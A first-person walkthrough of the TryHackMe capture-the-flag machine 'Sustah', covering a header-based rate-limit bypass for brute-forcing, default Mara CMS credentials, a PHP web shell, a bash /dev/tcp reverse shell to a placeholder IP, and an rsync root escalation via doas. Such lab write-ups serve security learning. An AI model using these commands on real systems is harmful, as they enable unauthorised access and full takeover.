[Writeup TryHackme: Sustah]
At this article I’ll show step by step how I completed the sustah, a free Capture The Flag (CTF) on TryHackMe.
On machine inicial page I did not see anything interessing, so I decided to go straight foward and run nmap
How we can see, there is three services running, and one of them in a high port called my attention, going to the port on web page, we have this following page:
It’s a roulette mini game, on which I input one valor and appeared this message “Oh no! How unlucky. Spin the wheel and try again.”, so I think the challenge was win the game, then I needed to do a bruteforce attack until win.
But the bruteforce attack stopped because of rate limit. Searching, I found some ways to bypass this rate limit, which gave me the opportunity to add diverses headers in request, for one them, get bypass, at burp configuration I used this shape:
First I sent a request for intruder on burp and added this headers for bypass:
•X-Forwarded-For:127.0.0.1
•X-Forwarded-Host:127.0.0.1
•X-Client-IP:127.0.0.1
•X-Remote-IP:127.0.0.1
•X-Remote-Addr:127.0.0.1
•X-Host:127.0.0.1
In numbers payload I put 10000–99999, this payload was made thinking on flag, because your valor have 5 digits. To facilitate, I created a python script to do this wordlist:
arq = open(‘num.txt’, ‘w’)
for x in range(10000, 99999):
┅┅┅ arq.writelines(str(x)+’\n’)
To ensure that I would find the correct request, I created a filter to identity the wrong requests,in another words , the right one do not have the check box checked
Finding the correct valor, it returned a directory for a web page on port 80
We can see in this page that is running a cms called “Mara“, but before search for a exploit, I decided to do a directories enumerate again(I already did the enumeration in the beginning, but I didn’t found anything)
On directories that I found, the one that most called my attention was the /log, because it have a login screen
Later, I don’t found more interessting things on directories, so I decided start searching for a exploit for Mara CMS
First I choose the one that would give me a reverse shell.
The first part of exploit was try to login with default credentials
admin:changeme
Then I got, with cms admin rights, I needed to upload my shell.
Shell file:
<?php system($_GET[“cmd”]); ?>
After uploading the shell the application says where find the shell
Now is possible run commands, so I catched a reverse shell
Command:
bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
Now, with a shell, I can explore better.
Searching, I found a backup folder which has a hidden file with passwords
One of them was a system user without cryptography, so I try to access
So I got the user flag, now I need to do privilegie escalation to get root flag, for this, I downloaded the linpeas on machine and got the following result:
Following to https://gtfobins.github.io I found a method to get root access using the rscync
Then I made a little change in command to get the root, and the final command was like this:
doas -u root sudo rsync -e ‘sh -c “sh 0<&2 1>&2”’ 127.0.0.1:/dev/null
Now, I got the root flag and finished the CTF.
Thank you for your attention!